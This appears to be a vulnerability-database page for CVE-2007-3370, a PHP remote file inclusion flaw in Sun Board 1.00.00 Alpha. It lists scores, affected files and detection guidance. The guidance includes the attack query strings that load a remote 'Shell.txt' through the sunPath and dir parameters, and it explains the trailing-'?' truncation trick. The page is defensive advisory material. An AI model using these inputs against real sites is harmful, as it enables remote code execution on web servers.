cbcvebase.
CVE-2007-3370
published 2007-06-22

CVE-2007-3370: Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath…

PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
74.53%
99.4th percentile
Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in (1) the sunPath parameter to include.php or (2) the dir parameter to skin/board/default/doctype.php.

Affected

1 ranges
VendorProductVersion rangeFixed in
kim_kyoung_minsun_board

Detection & IOCsextracted from sources · hover to see the quote

path/include.php
path/skin/board/default/doctype.php
command/include.php?sunPath=Shell.txt?
command/skin/board/default/doctype.php?dir=Shell.txt?
  • Monitor HTTP requests targeting /include.php with a user-supplied `sunPath` parameter containing a remote URL (e.g., http:// or ftp://) — classic RFI pattern used to load a remote shell.
  • Monitor HTTP requests targeting /skin/board/default/doctype.php with a user-supplied `dir` parameter containing a remote URL — second RFI vector in Sun Board 1.00.00 Alpha.
  • The exploit appends a null-terminating `?` after the remote file URL (e.g., Shell.txt?) to truncate the appended PHP extension — detect query strings in `sunPath` or `dir` parameters that end with `?` or contain remote URLs.
  • The vulnerable code directly passes the `sunPath` parameter into a `require` statement without sanitization — look for PHP `require`/`require_once` calls using unsanitized GET/POST parameters in Sun Board installations.
  • ·The RFI vulnerability is only exploitable if PHP's `allow_url_include` (or `allow_url_fopen`) directive is enabled on the target server, which is required for remote file inclusion via `require`/`require_once`.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.